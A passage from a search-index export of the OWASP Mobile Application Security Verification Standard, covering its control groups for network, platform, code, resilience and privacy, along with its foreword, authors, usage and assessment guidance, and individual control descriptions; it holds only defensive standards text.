"},{"location":"MASVS/08-MASVS-NETWORK/","title":"MASVS-NETWORK: Network Communication","text":"Secure networking is a critical aspect of mobile app security, particularly for apps that communicate over the network. In order to ensure the confidentiality and integrity of data in transit, developers typically rely on encryption and authentication of the remote endpoint, such as through the use of TLS. However, there are numerous ways in which a developer may accidentally disable the platform secure defaults or bypass them entirely by utilizing low-level APIs or third-party libraries.
This category is designed to ensure that the mobile app sets up secure connections under any circumstances. Specifically, it focuses on verifying that the app establishes a secure, encrypted channel for network communication. Additionally, this category covers situations where a developer may choose to trust only specific Certificate Authorities (CAs), which is commonly referred to as certificate pinning or public key pinning.
"},{"location":"MASVS/09-MASVS-PLATFORM/","title":"MASVS-PLATFORM: Platform Interaction","text":"The security of mobile apps heavily depends on their interaction with the mobile platform, which often involves exposing data or functionality intentionally through the use of platform-provided inter-process communication (IPC) mechanisms and WebViews to enhance the user experience. However, these mechanisms can also be exploited by attackers or other installed apps, potentially compromising the app's security.
Furthermore, sensitive data, such as passwords, credit card details, and one-time passwords in notifications, is often displayed in the app's user interface. It is essential to ensure that this data is not unintentionally leaked through platform mechanisms such as auto-generated screenshots or accidental disclosure through shoulder surfing or device sharing.
This category comprises controls that ensure the app's interactions with the mobile platform occur securely. These controls cover the secure use of platform-provided IPC mechanisms, WebView configurations to prevent sensitive data leakage and functionality exposure, and secure display of sensitive data in the app's user interface. By implementing these controls, mobile app developers can safeguard sensitive user information and prevent unauthorized access by attackers.
"},{"location":"MASVS/10-MASVS-CODE/","title":"MASVS-CODE: Code Quality","text":"Mobile apps have many data entry points, including the UI, IPC, network, and file system, which might receive data that has been inadvertently modified by untrusted actors. By treating this data as untrusted input and properly verifying and sanitizing it before use, developers can prevent classical injection attacks, such as SQL injection, XSS, or insecure deserialization. However, other common coding vulnerabilities, such as memory corruption flaws, are hard to detect in penetration testing but easy to prevent with secure architecture and coding practices. Developers should follow best practices such as the OWASP Software Assurance Maturity Model (SAMM) and NIST.SP.800-218 Secure Software Development Framework (SSDF) to avoid introducing these flaws in the first place.
This category covers coding vulnerabilities that arise from external sources such as app data entry points, the OS, and third-party software components. Developers should verify and sanitize all incoming data to prevent injection attacks and bypass of security checks. They should also enforce app updates and ensure that the app runs up-to-date platforms to protect users from known vulnerabilities.
"},{"location":"MASVS/11-MASVS-RESILIENCE/","title":"MASVS-RESILIENCE: Resilience Against Reverse Engineering and Tampering","text":"Defense-in-depth measures such as code obfuscation, anti-debugging, anti-tampering, etc. are important to increase app resilience against reverse engineering and specific client-side attacks. They add multiple layers of security controls to the app, making it more difficult for attackers to successfully reverse engineer and extract valuable intellectual property or sensitive data from it, which could result in:
The controls in this category aim to ensure that the app is running on a trusted platform, prevent tampering at runtime and ensure the integrity of the app's intended functionality. Additionally, the controls impede comprehension by making it difficult to figure out how the app works using static analysis and prevent dynamic analysis and instrumentation that could allow an attacker to modify the code at runtime.
However, note that the lack of any of these measures does not necessarily cause vulnerabilities - instead, they add threat-specific additional protection to apps which must also fulfil the rest of the OWASP MASVS security controls according to their specific threat models.
"},{"location":"MASVS/12-MASVS-PRIVACY/","title":"MASVS-PRIVACY: Privacy","text":"The main goal of MASVS-PRIVACY is to provide a baseline for user privacy. It is not intended to cover all aspects of user privacy, especially when other standards and regulations such as ENISA or the GDPR already do that. We focus on the app itself, looking at what can be tested using information that's publicly available or found within the app through methods like static or dynamic analysis.
While some associated tests can be automated, others necessitate manual intervention due to the nuanced nature of privacy. For example, if an app collects data that it didn't mention in the app store or its privacy policy, it takes careful manual checking to spot this.
Note on \"Data Collection and Sharing\":For the MASTG tests, we treat \"Collect\" and \"Share\" in a unified manner. This means that whether the app is sending data to another server or transferring it to another app on the device, we view it as data that's potentially leaving the user's control. Validating what happens to the data on remote endpoints is challenging and often not feasible due to access restrictions and the dynamic nature of server-side operations. Therefore, this issue is outside of the scope of the MASVS.
IMPORTANT DISCLAIMER:
MASVS-PRIVACY is not intended to serve as an exhaustive or exclusive reference. While it provides valuable guidance on app-centric privacy considerations, it should never replace comprehensive assessments, such as a Data Protection Impact Assessment (DPIA) mandated by the General Data Protection Regulation (GDPR) or other pertinent legal and regulatory frameworks. Stakeholders are strongly advised to undertake a holistic approach to privacy, integrating MASVS-PRIVACY insights with broader assessments to ensure comprehensive data protection compliance. Given the specialized nature of privacy regulations and the complexity of data protection, these assessments are best conducted by privacy experts rather than security experts.
"},{"location":"MASVS/CHANGELOG/","title":"Changelog","text":""},{"location":"MASVS/CHANGELOG/#v131-and-newer","title":"V1.3.1 and newer","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page.
"},{"location":"MASVS/CHANGELOG/#v13-13-may-2021","title":"V1.3 - 13 May 2021","text":"We are proud to announce the introduction of a new document build pipeline, which is a major milestone for our project. The build pipeline is based on Pandocker and Github Actions. This significantly reduces the time spent on creating new releases and will also be the foundation for the OWASP MSTG and will be made available for the OWASP ASVS project.
"},{"location":"MASVS/CHANGELOG/#changes","title":"Changes","text":"The following changes are part of release 1.2:
The following changes are part of pre-release 1.2:
The following changes are part of release 1.1.4:
The following changes are part of release 1.1.2:
The following changes are part of release 1.1:
The following changes are part of release 1.0:
Technological revolutions can happen quickly. Less than a decade ago, smartphones were clunky devices with little keyboards - expensive playthings for tech-savvy business users. Today, smartphones are an essential part of our lives. We've come to rely on them for information, navigation and communication, and they are ubiquitous both in business and in our social lives.
Every new technology introduces new security risks, and keeping up with those changes is one of the main challenges the security industry faces. The defensive side is always a few steps behind. For example, the default reflex for many was to apply old ways of doing things: Smartphones are like small computers, and mobile apps are just like classic software, so surely the security requirements are similar? But it doesn't work like that. Smartphone operating systems are different from desktop operating systems, and mobile apps are different from web apps. For example, the classical method of signature-based virus scanning doesn't make sense in modern mobile OS environments: Not only is it incompatible with the mobile app distribution model, it's also technically impossible due to sandboxing restrictions. Also, some vulnerability classes, such as buffer overflows and XSS issues, are less relevant in the context of run-of-the-mill mobile apps than in, say, desktop apps and web applications (exceptions apply).
Over time, our industry has gotten a better grip on the mobile threat landscape. As it turns out, mobile security is all about data protection: Apps store our personal information, pictures, recordings, notes, account data, business information, location and much more. They act as clients that connect us to services we use on a daily basis, and as communications hubs that processes each and every message we exchange with others. Compromise a person's smartphone and you get unfiltered access to that person's life. When we consider that mobile devices are more readily lost or stolen and mobile malware is on the rise, the need for data protection becomes even more apparent.
A security standard for mobile apps must therefore focus on how mobile apps handle, store and protect sensitive information. Even though modern mobile operating systems like iOS and Android offer mature APIs for secure data storage and communication, those have to be implemented and used correctly in order to be effective. Data storage, inter-app communication, proper usage of cryptographic APIs and secure network communication are only some of the aspects that require careful consideration.
An important question in need of industry consensus is how far exactly one should go in protecting the confidentiality and integrity of data. For example, most of us would agree that a mobile app should verify the server certificate in a TLS exchange. But what about certificate or public key pinning? Does not doing it result in a vulnerability? Should this be a requirement if an app handles sensitive data, or is it maybe even counter-productive? Do we need to encrypt data stored in SQLite databases, even though the OS sandboxes the app? What is appropriate for one app might be unrealistic for another. The MASVS is an attempt to standardize these requirements using profiles that fit different threat scenarios.
Furthermore, the appearance of root malware and remote administration tools has created awareness of the fact that mobile operating systems themselves have exploitable flaws, so containerization strategies are increasingly used to afford additional protection to sensitive data and prevent client-side tampering. This is where things get complicated. Hardware- backed security features and OS-level containerization solutions, such as Android Enterprise and Samsung Knox, do exist, but they aren't consistently available across different devices. As a band aid, it is possible to implement software-based protection measures - but unfortunately, there are no standards or testing processes for verifying these kinds of protections.
As a result, mobile app security testing reports are all over the place: For example, some testers report a lack of obfuscation or root detection in an Android app as \u201csecurity flaw\u201d. On the other hand, measures like string encryption, debugger detection or control flow obfuscation aren't considered mandatory. However, this binary way of looking at things doesn't make sense because resilience is not a binary proposition: It depends on the particular client-side threats one aims to defend against. Software protections are not useless, but they can ultimately be bypassed, so they must never be used as a replacement for security controls.
The overall goal of the MASVS is to offer a baseline for mobile application security, while also allowing for the inclusion of defense-in-depth measures and protections against client-side threats. The MASVS is meant to achieve the following:
We are aware that 100% industry consensus is impossible to achieve. Nevertheless, we hope that the MASVS is useful in providing guidance throughout all phases of mobile app development and testing. As an open source standard, the MASVS will evolve over time, and we welcome any contributions and suggestions.
By Bernhard Mueller
"},{"location":"MASVS/Intro/02-Frontispiece/","title":"About the Standard","text":"The OWASP Mobile Application Security Verification Standard (MASVS) is the industry standard for mobile application security. It provides a comprehensive set of security controls that can be used to assess the security of mobile apps across various platforms (e.g., Android, iOS) and deployment scenarios (e.g., consumer, enterprise). The standard covers the key components of the mobile app attack surface including storage, cryptography, authentication and authorization, network communication, interaction with the mobile platform, code quality and resilience against reverse engineering and tampering.
The OWASP MASVS is the result of years of community effort and industry feedback. We thank all the contributors who have helped shape this standard. We welcome your feedback on the OWASP MASVS at any time, especially as you apply it to your own organization and mobile app development projects. Getting inputs from a variety of mobile app developers will help us improve and update the standard which is revised periodically based on your inputs and feedback.
You can provide feedback using GitHub Discussions in the OWASP MASVS repo https://github.com/OWASP/owasp-masvs/discussions, or contact the project leads directly https://mas.owasp.org/contact/.
The OWASP MASVS and MASTG are trusted by the following platform providers and standardization, governmental and educational institutions. Learn more.
"},{"location":"MASVS/Intro/02-Frontispiece/#authors","title":"Authors","text":""},{"location":"MASVS/Intro/02-Frontispiece/#sven-schleier","title":"Sven Schleier","text":"
Sven is specialised in penetration testing and application security and has guided numerous projects to build security in from the start. He strongly believes in knowledge sharing and is speaking worldwide at meetups and conferences, is an adjunct professor and is conducting hands-on workshops about mobile app security to penetration testers, developers and students.
"},{"location":"MASVS/Intro/02-Frontispiece/#carlos-holguera","title":"Carlos Holguera","text":"Carlos is a mobile security research engineer with many years of hands-on experience in security testing for mobile apps and embedded systems such as automotive control units and IoT devices. He is passionate about reverse engineering and dynamic instrumentation of mobile apps and is continuously learning and sharing his knowledge.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-beckers","title":"Jeroen Beckers","text":"Jeroen is a mobile security lead responsible for quality assurance on mobile security projects and for R&D on all things mobile. Ever since his master's thesis on Android security, Jeroen has been interested in mobile devices and their (in)security. He loves sharing his knowledge with other people, as is demonstrated by his many talks & trainings at colleges, universities, clients and conferences.
"},{"location":"MASVS/Intro/02-Frontispiece/#bernhard-mueller","title":"Bernhard Mueller","text":"Bernhard is a cyber security specialist with a talent for hacking systems of all kinds. During more than a decade in the industry, he has published many zero-day exploits for software. BlackHat USA commended his pioneering work in mobile security with a Pwnie Award for Best Research.
"},{"location":"MASVS/Intro/02-Frontispiece/#jeroen-willemsen","title":"Jeroen Willemsen","text":"Jeroen is a principal security architect with a passion for mobile security and risk management. He has supported companies as a security coach, a security engineer and as a full-stack developer. He loves explaining technical subjects: from security issues to programming challenges.
"},{"location":"MASVS/Intro/02-Frontispiece/#contributors","title":"Contributors","text":"All of our contributors are listed in the Contributing section of the OWASP MAS website:
https://mas.owasp.org/contributing/
"},{"location":"MASVS/Intro/02-Frontispiece/#donators","title":"Donators","text":"While both the MASVS and the MASTG are created and maintained by the community on a voluntary basis, sometimes outside help is required. We therefore thank our donators for providing the funds to be able to hire technical editors. Note that their donation does not influence the content of the MASVS or MASTG in any way. The Donation Packages are described on the OWASP MAS Website.
"},{"location":"MASVS/Intro/02-Frontispiece/#changelog","title":"Changelog","text":"All our Changelogs are available online at the OWASP MASVS GitHub repository, see the Releases page:
https://github.com/OWASP/owasp-masvs/releases
"},{"location":"MASVS/Intro/02-Frontispiece/#copyright-and-license","title":"Copyright and License","text":"Copyright \u00a9 The OWASP Foundation. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License. For any reuse or distribution, you must make clear to others the license terms of this work.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/","title":"The Mobile Application Security Verification Standard","text":"The Mobile Application Security Verification Standard (MASVS) is a comprehensive security standard developed by the Open Worldwide Application Security Project (OWASP). This framework provides a clear and concise set of guidelines and best practices for assessing and enhancing the security of mobile applications. The MASVS is designed to be used as a metric, guidance, and baseline for mobile app security verification, serving as a valuable resource for developers, application owners, and security professionals.
The objective of the MASVS is to establish a high level of confidence in the security of mobile apps by providing a set of controls that address the most common mobile application security issues. These controls were developed with a focus on providing guidance during all phases of mobile app development and testing, and to be used as a baseline for mobile app security verification during procurement.
By adhering to the controls outlined in the OWASP MASVS, organizations can ensure that their mobile applications are built with security in mind, reducing the risk of security breaches and protecting sensitive user data. Whether used as a metric, guidance, or baseline, the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications.
The OWASP MASVS is a living document and is regularly updated to reflect the changing threat landscape and new attack vectors. As such, it's important to stay up-to-date with the latest version of the standard and adapt security measures accordingly.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mobile-application-security-model","title":"Mobile Application Security Model","text":"The standard is divided into various groups that represent the most critical areas of the mobile attack surface. These control groups, labeled MASVS-XXXXX, provide guidance and standards for the following areas:
Each of these control groups contains individual controls labeled MASVS-XXXXX-Y, which provide specific guidance on the particular security measures that need to be implemented to meet the standard.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#mas-testing-profiles","title":"MAS Testing Profiles","text":"The MAS project has traditionally provided three verification levels (L1, L2 and R), which were revisited during the MASVS refactoring in 2023, and have been reworked as \"MAS Testing Profiles\" and moved over to the OWASP MASTG. These profiles are now aligned with the NIST OSCAL (Open Security Controls Assessment Language) standard, which is a comprehensive catalog of security controls that can be used to secure information systems.
By aligning with OSCAL, the MASVS provides a more flexible and comprehensive approach to security testing. OSCAL provides a standard format for security control information, which allows for easier sharing and reuse of security controls across different systems and organizations. This allows for a more efficient use of resources and a more targeted approach to mobile app security testing.
However, it is important to note that implementing these profiles fully or partially should be a risk-based decision made in consultation with business owners. The profiles should be tailored to the specific security risks and requirements of the mobile application being developed, and any deviations from the recommended controls should be carefully justified and documented.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#assumptions","title":"Assumptions","text":"When using the MASVS, it's important to keep in mind the following assumptions:
While the OWASP MASVS is an invaluable tool for enhancing the security of mobile applications, it cannot guarantee absolute security. It should be used as a baseline for security requirements, but additional security measures should also be implemented as appropriate to address specific risks and threats to the mobile app.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-architecture-design-and-threat-modeling-for-mobile-apps","title":"Security Architecture, Design and Threat Modeling for Mobile Apps","text":"The OWASP MASVS assumes that best practices for secure architecture, design, and threat modeling have been followed as a foundation.
Security must be a top priority throughout all stages of mobile app development, from the initial planning and design phase to deployment and ongoing maintenance. Developers need to follow secure development best practices and ensure that security measures are prioritized to protect sensitive data, comply with policies and regulations, and identify and address security issues that can be targeted by attackers.
While the MASVS and MASTG focuses on controls and technical test cases for app security assessments, non-technical aspects such as following best practices laid out by OWASP Software Assurance Maturity Model (SAMM) or NIST.SP.800-218 Secure Software Development Framework (SSDF) for secure architecture, design, and threat modeling are still important. The MASVS can also be used as reference and input for a threat model to raise awareness of potential attacks.
To ensure that these practices are followed, developers can provide documentation or evidence of adherence to these standards, such as design documents, threat models, and security architecture diagrams. Additionally, interviews can be conducted to collect information on adherence to these practices and provide an understanding of the level of compliance with these standards.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#secure-app-ecosystem","title":"Secure App Ecosystem","text":"The OWASP MASVS assumes other relevant security standards are also leveraged to ensure that all systems involved in the app's operation meet their applicable requirements.
Mobile apps often interact with multiple systems, including backend servers, third-party APIs, Bluetooth devices, cars, IoT devices, and more. Each of these systems may introduce their own security risks that must be considered as part of the mobile app's security design and threat modeling. For example, when interacting with a backend server, the OWASP Application Security Verification Standard (ASVS) should be used to ensure that the server is secure and meets the required security standards. In the case of Bluetooth devices, the app should be designed to prevent unauthorized access, while for cars, the app should be designed to protect the user's data and ensure that there are no safety issues with the car's operation.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#security-knowledge-and-expertise","title":"Security Knowledge and Expertise","text":"The OWASP MASVS assumes a certain level of security knowledge and expertise among developers and security professionals using the standard. It's important to have a good understanding of mobile app security concepts, as well as the relevant tools and techniques used for mobile app security testing and assessment. To support this, the OWASP MAS project also provides the OWASP Mobile Application Security Testing Guide (MASTG), which provides in-depth guidance on mobile app security testing and assessment.
Mobile app development is a rapidly evolving field, with new technologies, programming languages, and frameworks constantly emerging. It's essential for developers and security professionals to stay current with these developments, as well as to have a solid foundation in fundamental security principles.
OWASP SAMM provides a dedicated \"Education & Guidance\" domain which aims to ensure that all stakeholders involved in the software development lifecycle are aware of the software security risks and are equipped with the knowledge and skills to mitigate these risks. This includes developers, testers, architects, project managers, executives, and other personnel involved in software development and deployment.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#applicability-of-the-masvs","title":"Applicability of the MASVS","text":"By adhering to the MASVS, businesses and developers can ensure that their mobile app are secure and meet industry-standard security requirements, regardless of the development approach used. This is the case for downloadable apps, as the project was traditionally focused on, but the MAS resources and guidelines are also applicable to other areas of the business such as preloaded applications and SDKs.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#native-apps","title":"Native Apps","text":"Native apps are written in platform-specific languages, such as Java/Kotlin for Android or Objective-C/Swift for iOS.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#cross-platform-and-hybrid-apps","title":"Cross-Platform and Hybrid Apps","text":"Apps based on cross-platform (Flutter, React Native, Xamarin, Ionic, etc.) and hybrid (Cordova, PhoneGap, Framework7, Onsen UI, etc.) frameworks may be susceptible to platform-specific vulnerabilities that don't exist in native apps. For example, some JavaScript frameworks may introduce new security issues that don't exist in other programming languages. It is therefore essential to follow the security best practices of the used frameworks.
The MASVS is agnostic to the type of mobile application being developed. This means that the guidelines and best practices outlined in the MASVS can be applied to all types of mobile apps, including cross-platform and hybrid apps.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#preloads","title":"Preloads","text":"Preloaded apps are apps that are installed on a user's device at factory time and may have elevated privileges that leave users vulnerable to exploitative business practices. Given the large number of preloaded apps on an average user's device, it's important to measure their risk in a quantifiable way.
There are hundreds of preloads that may ship on a device, and as a result, automation is critical. A subset of MAS criteria that is automation-friendly may be a good basis.
"},{"location":"MASVS/Intro/03-Using_the_MASVS/#sdks","title":"SDKs","text":"SDKs play a vital role in the mobile app value chain, supplying code developers need to build faster, smarter, and more profitably. Developers rely on them heavily, with the average mobile app using 30 SDKs, and 90% of code sourced from third parties. While this widespread use delivers significant benefits to developers, it also propagates safety and security issues.
SDKs offer a variety of functionality, and should be regarded as an individual project. You should evaluate how the MASVS applies to the used SDKs to ensure the highest possible security testing coverage.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/","title":"Assessment and Certification","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#owasps-stance-on-masvs-certifications-and-trust-marks","title":"OWASP's Stance on MASVS Certifications and Trust Marks","text":"OWASP, as a vendor-neutral not-for-profit organization, does not certify any vendors, verifiers or software.
All such assurance assertions, trust marks, or certifications are not officially vetted, registered, or certified by OWASP, so an organization relying upon such a view needs to be cautious of the trust placed in any third party or trust mark claiming (M)ASVS certification.
This should not inhibit organizations from offering such assurance services, as long as they do not claim official OWASP certification.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#guidance-for-certifying-mobile-apps","title":"Guidance for Certifying Mobile Apps","text":"The recommended way of verifying compliance of a mobile app with the MASVS is by performing an \"open book\" review, meaning that the testers are granted access to key resources such as architects and developers of the app, project documentation, source code, and authenticated access to endpoints, including access to at least one user account for each role.
It is important to note that the MASVS only covers the security of the mobile app (client-side). It does not contain specific controls for the remote endpoints (e.g. web services) associated with the app and they should be verified against appropriate standards, such as the OWASP ASVS.
A certifying organization must include in any report the scope of the verification (particularly if a key component is out of scope), a summary of verification findings, including passed and failed tests, with clear indications of how to resolve the failed tests. Keeping detailed work papers, screenshots or recording, scripts to reliably and repeatedly exploit an issue, and electronic records of testing, such as intercepting proxy logs and associated notes such as a cleanup list, is considered standard industry practice. It is not sufficient to simply run a tool and report on the failures; this does not provide sufficient evidence that all issues at a certifying level have been tested and tested thoroughly. In case of dispute, there should be sufficient supportive evidence to demonstrate that every verified control has indeed been tested.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#using-the-owasp-mobile-application-security-testing-guide-mastg","title":"Using the OWASP Mobile Application Security Testing Guide (MASTG)","text":"The OWASP MASTG is a manual for testing the security of mobile apps. It describes the technical processes for verifying the controls listed in the MASVS. The MASTG includes a list of test cases, each of which map to a control in the MASVS. While the MASVS controls are high-level and generic, the MASTG provides in-depth recommendations and testing procedures on a per-mobile-OS basis.
Testing the app's remote endpoints is not covered in the MASTG. For example:
The use of source code scanners and black-box testing tools is encouraged in order to increase efficiency whenever possible. It is however not possible to complete MASVS verification using automated tools alone, since every mobile app is different. In order to fully verify the security of the app it is essential to understand the overall architecture, business logic, and technical pitfalls of the specific technologies and frameworks being used.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#other-uses","title":"Other Uses","text":""},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-detailed-security-architecture-guidance","title":"As Detailed Security Architecture Guidance","text":"One of the more common uses for the Mobile Application Security Verification Standard is as a resource for security architects. The two major security architecture frameworks, SABSA or TOGAF, are missing a great deal of information that is necessary to complete mobile application security architecture reviews. MASVS can be used to fill in those gaps by allowing security architects to choose better controls for issues common to mobile apps.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-replacement-for-off-the-shelf-secure-coding-checklists","title":"As a Replacement for Off-the-shelf Secure Coding Checklists","text":"Many organizations can benefit from adopting the MASVS, by choosing one of the two levels, or by forking MASVS and changing what is required for each application's risk level in a domain-specific way. We encourage this type of forking as long as traceability is maintained, so that if an app has passed control 4.1, this means the same thing for forked copies as the standard evolves.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-basis-for-security-testing-methodologies","title":"As a Basis for Security Testing Methodologies","text":"A good mobile app security testing methodology should cover all controls listed in the MASVS. The OWASP Mobile Application Security Testing Guide (MASTG) describes black-box and white-box test cases for each verification control.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#as-a-guide-for-automated-unit-and-integration-tests","title":"As a Guide for Automated Unit and Integration Tests","text":"The MASVS is designed to be highly testable, with the sole exception of architectural controls. Automated unit, integration and acceptance testing based on the MASVS controls can be integrated in the continuous development lifecycle. This not only increases developer security awareness, but also improves the overall quality of the resulting apps, and reduces the amount of findings during security testing in the pre-release phase.
"},{"location":"MASVS/Intro/04-Assessment_and_Certification/#for-secure-development-training","title":"For Secure Development Training","text":"MASVS can also be used to define characteristics of secure mobile apps. Many \"secure coding\" courses are simply ethical hacking courses with a light smear of coding tips. This does not help developers. Instead, secure development courses can use the MASVS, with a strong focus on the proactive controls documented in the MASVS, rather than e.g. the Top 10 code security issues.
"},{"location":"MASVS/controls/MASVS-AUTH-1/","title":"MASVS-AUTH-1","text":"The app uses secure authentication and authorization protocols and follows the relevant best practices.
Most apps connecting to a remote endpoint require user authentication and also enforce some kind of authorization. While the enforcement of these mechanisms must be on the remote endpoint, the apps also have to ensure that it follows all the relevant best practices to ensure a secure use of the involved protocols.
"},{"location":"MASVS/controls/MASVS-AUTH-2/","title":"MASVS-AUTH-2","text":"The app performs local authentication securely according to the platform best practices.
Many apps allow users to authenticate via biometrics or a local PIN code. These authentication mechanisms need to be correctly implemented. Additionally, some apps might not have a remote endpoint, and rely fully on local app authentication.
"},{"location":"MASVS/controls/MASVS-AUTH-3/","title":"MASVS-AUTH-3","text":"The app secures sensitive operations with additional authentication.
Some additional form of authentication is often desirable for sensitive actions inside the app. This can be done in different ways (biometric, pin, MFA code generator, email, deep links, etc) and they all need to be implemented securely.
"},{"location":"MASVS/controls/MASVS-CODE-1/","title":"MASVS-CODE-1","text":"The app requires an up-to-date platform version.
Every release of the mobile OS includes security patches and new security features. By supporting older versions, apps stay vulnerable to well-known threats. This control ensures that the app is running on an up-to-date platform version so that users have the latest security protections.
"},{"location":"MASVS/controls/MASVS-CODE-2/","title":"MASVS-CODE-2","text":"The app has a mechanism for enforcing app updates.
Sometimes critical vulnerabilities are discovered in the app when it is already in production. This control ensures that there is a mechanism to force the users to update the app before they can continue using it.
"},{"location":"MASVS/controls/MASVS-CODE-3/","title":"MASVS-CODE-3","text":"The app only uses software components without known vulnerabilities.
To be truly secure, a full whitebox assessment should have been performed on all app components. However, as it usually happens with e.g. for third-party components this is not always feasible and not typically part of a penetration test. This control covers \"low-hanging fruit\" cases, such as those that can be detected just by scanning libraries for known vulnerabilities.
"},{"location":"MASVS/controls/MASVS-CODE-4/","title":"MASVS-CODE-4","text":"The app validates and sanitizes all untrusted inputs.
Apps have many data entry points including the UI, IPC, the network, the file system, etc. This incoming data might have been inadvertently modified by untrusted actors and may lead to bypass of critical security checks as well as classical injection attacks such as SQL injection, XSS or insecure deserialization. This control ensures that this data is treated as untrusted input and is properly verified and sanitized before it's used.
"},{"location":"MASVS/controls/MASVS-CRYPTO-1/","title":"MASVS-CRYPTO-1","text":"The app employs current strong cryptography and uses it according to industry best practices.
Cryptography plays an especially important role in securing the user's data - even more so in a mobile environment, where attackers having physical access to the user's device is a likely scenario. This control covers general cryptography best practices, which are typically defined in external standards.
"},{"location":"MASVS/controls/MASVS-CRYPTO-2/","title":"MASVS-CRYPTO-2","text":"The app performs key management according to industry best practices.
Even the strongest cryptography would be compromised by poor key management. This control covers the management of cryptographic keys throughout their lifecycle, including key generation, storage and protection.
"},{"location":"MASVS/controls/MASVS-NETWORK-1/","title":"MASVS-NETWORK-1","text":"The app secures all network traffic according to the current best practices.
Ensuring data privacy and integrity of any data in transit is critical for any app that communicates over the network. This is typically done by encrypting data and authenticating the remote endpoint, as TLS does. However, there are many ways for a developer to disable the platform secure defaults, or bypass them completely by using low-level APIs or third-party libraries. This control ensures that the app is in fact setting up secure connections in any situation.
"},{"location":"MASVS/controls/MASVS-NETWORK-2/","title":"MASVS-NETWORK-2","text":"The app performs identity pinning for all remote endpoints under the developer's control.
Instead of trusting all the default root CAs of the framework or device, this control will make sure that only very specific CAs are trusted. This practice is typically called certificate pinning or public key pinning.
"},{"location":"MASVS/controls/MASVS-PLATFORM-1/","title":"MASVS-PLATFORM-1","text":"The app uses IPC mechanisms securely.
Apps typically use platform provided IPC mechanisms to intentionally expose data or functionality. Both installed apps and the user are able to interact with the app in many different ways. This control ensures that all interactions involving IPC mechanisms happen securely.
"},{"location":"MASVS/controls/MASVS-PLATFORM-2/","title":"MASVS-PLATFORM-2","text":"The app uses WebViews securely.
WebViews are typically used by apps that have a need for increased control over the UI. This control ensures that WebViews are configured securely to prevent sensitive data leakage as well as sensitive functionality exposure (e.g. via JavaScript bridges to native code).
"},{"location":"MASVS/controls/MASVS-PLATFORM-3/","title":"MASVS-PLATFORM-3","text":"The app uses the user interface securely.
Sensitive data has to be displayed in the UI in many situations (e.g. passwords, credit card details, OTP codes in notifications). This control ensures that this data doesn't end up being unintentionally leaked due to platform mechanisms such as auto-generated screenshots or accidentally disclosed via e.g. shoulder surfing or sharing the device with another person.
"},{"location":"MASVS/controls/MASVS-PRIVACY-1/","title":"MASVS-PRIVACY-1","text":"The app minimizes access to sensitive data and resources.
Apps should only request access to the data they absolutely need for their functionality and always with informed consent from the user. This control ensures that apps practice data minimization and restricts access control, reducing the potential impact of data breaches or leaks.
Furthermore, apps should share data with third parties only when necessary, and this should include enforcing that third-party SDKs operate based on user consent, not by default or without it. Apps should prevent third-party SDKs from ignoring consent signals or from collecting data before consent is confirmed.
Additionally, apps should be aware of the 'supply chain' of SDKs they incorporate, ensuring that no data is unnecessarily passed down their chain of dependencies. This end-to-end responsibility for data aligns with recent SBOM regulatory requirements, making apps more accountable for their data practices.
"},{"location":"MASVS/controls/MASVS-PRIVACY-2/","title":"MASVS-PRIVACY-2","text":"The app prevents identification of the user.
Protecting user identity is crucial. This control emphasizes the use of unlinkability techniques like data abstraction, anonymization and pseudonymization to prevent user identification and tracking.
Another key aspect addressed by this control is to establish technical barriers when employing complex 'fingerprint-like' signals (e.g. device IDs, IP addresses, behavioral patterns) for specific purposes. For instance, a fingerprint used for fraud detection should be isolated and not repurposed for audience measurement in an analytics SDK. This ensures that each data stream serves its intended function without risking user privacy.
"},{"location":"MASVS/controls/MASVS-PRIVACY-3/","title":"MASVS-PRIVACY-3","text":"The app is transparent about data collection and usage.
Users have the right to know how their data is being used. This control ensures that apps provide clear information about data collection, storage, and sharing practices, including any behavior a user wouldn't reasonably expect, such as background data collection. Apps should also adhere to platform guidelines on data declarations.
"},{"location":"MASVS/controls/MASVS-PRIVACY-4/","title":"MASVS-PRIVACY-4","text":"The app offers user control over their data.
Users should have control over their data. This control ensures that apps provide mechanisms for users to manage, delete, and modify their data, and change privacy settings as needed (e.g. to revoke consent). Additionally, apps should re-prompt for consent and update their transparency disclosures when they require more data than initially specified.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-1/","title":"MASVS-RESILIENCE-1","text":"The app validates the integrity of the platform.
Running on a platform that has been tampered with can be very dangerous for apps, as this may disable certain security features, putting the data of the app at risk. Trusting the platform is essential for many of the MASVS controls relying on the platform being secure (e.g. secure storage, biometrics, sandboxing, etc.). This control tries to validate that the OS has not been compromised and its security features can thus be trusted.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-2/","title":"MASVS-RESILIENCE-2","text":"The app implements anti-tampering mechanisms.
Apps run on a user-controlled device, and without proper protections it's relatively easy to run a modified version locally (e.g. to cheat in a game, or enable premium features without paying), or upload a backdoored version of it to third-party app stores. This control tries to ensure the integrity of the app's intended functionality by preventing modifications to the original code and resources.
"},{"location":"MASVS/controls/MASVS-RESILIENCE-3/","title":"MASVS-RESILIENCE-3","text":"The app implements anti-static analysis mechanisms.
Understanding the internals of an app is typically the first step towards tampering with it (either dynamically, or statically). This control tries to impede comprehension by making it as difficult as possible to figure out how an app works using static analysis.
